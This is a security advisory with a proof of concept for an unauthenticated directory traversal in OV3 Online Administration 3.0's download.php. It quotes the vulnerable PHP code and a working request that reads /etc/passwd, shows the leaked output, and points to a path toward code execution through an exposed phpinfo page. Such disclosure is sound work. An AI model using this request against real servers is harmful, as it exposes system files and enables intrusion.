OV3 Online Administration 3.0 Parameter Traversal Arbitrary File Access PoC Exploit Vendor: novaCapta Software & Consulting GmbH Product web page: http://www.meacon.de Affected version: 3.0 Summary: With the decision to use the OV3 as a platform for your data management, the course is set for scalable, flexible and high-performance applications. Whether you use the OV3 for your internal data management or use it for commercial business applications such as shops, portals, etc. Thanks to the data-based structure of the OV3, you always have the best tool at your fingertips. The OV3 is a 100% web-based tool. This eliminates the need to install a new software on all participating client computers. All elements are operated by a standard browser. Further advantages are the location-dependent use and - particularly with ASP solutions - the reduced costs for local hardware like own servers and modern client workstations. Desc: The application (Online Verwaltung III) suffers from an unauthenticated file disclosure vulnerability when input passed thru the 'file' parameter to 'download.php' script is not properly verified before being used to include files. This can be exploited to read arbitrary files from local resources with directory traversal attacks. ================================================================================ /download.php: -------------- 67: header("Expires: Mon, 1 Apr 1990 00:00:00 GMT"); 68: header("Last-Modified: " . gmdate("D,d M YH:i:s") . " GMT"); 69: /* 70: header("Cache-Control: no-cache, must-revalidate"); 71: header("Pragma: no-cache"); 72: */ 73: header("Pragma: "); 74: header("Cache-Control: "); 75: header("Content-type: application/octet-stream"); 76: header("Content-Type: application/force-download"); 77: $dname = rawurlencode($name); 78: header("Content-Disposition: attachment; filename=\"$dname\";"); 79: 80: if ($export==1) { 81: if (is_file($path.'/'.$file)) { 82: header('Content-Length: '.filesize($path.'/'.$file)); 83: readfile($path.'/'.$file); 84: } elseif (is_file(utf8_decode($path.'/'.$file))) { 85: header('Content-Length: '.filesize(utf8_decode($path.'/'.$file))); 86: readfile(utf8_decode($path.'/'.$file)); 87: } 88: } ================================================================================ Tested on: CentOS release 6.8 (Final) PHP/5.3.3 Apache/2.2.15 MySQL/5.0.11 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2017-5410 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5410.php 26.12.2016 --- GET /download.php?c_id=557&file=../../../../../../../../../../../etc/passwd&name=download.txt HTTP/1.1 Host: 127.0.0.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: ZSL/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate, sdch Accept-Language: en-US,en;q=0.8 DNT: 1 Connection: close -- HTTP/1.1 200 OK Date: Tue, 27 Dec 2016 12:24:10 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3 Expires: Mon, 1 Apr 1990 00:00:00 GMT Last-Modified: Tue,27 Dec 201612:24:10 GMT Pragma: Cache-Control: Content-Disposition: attachment; filename="download.txt"; Content-Length: 0 Connection: close Content-Type: application/force-download root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown ... ... The application ships with a phpinfo() file "m_info.php" by default in the web root directory: http://127.0.0.1/m_info.php Possibly exploitable for code execution using the PHP LFI to RCE method by Gynvael Coldwind, extended by Brett Moore: - http://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf - https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf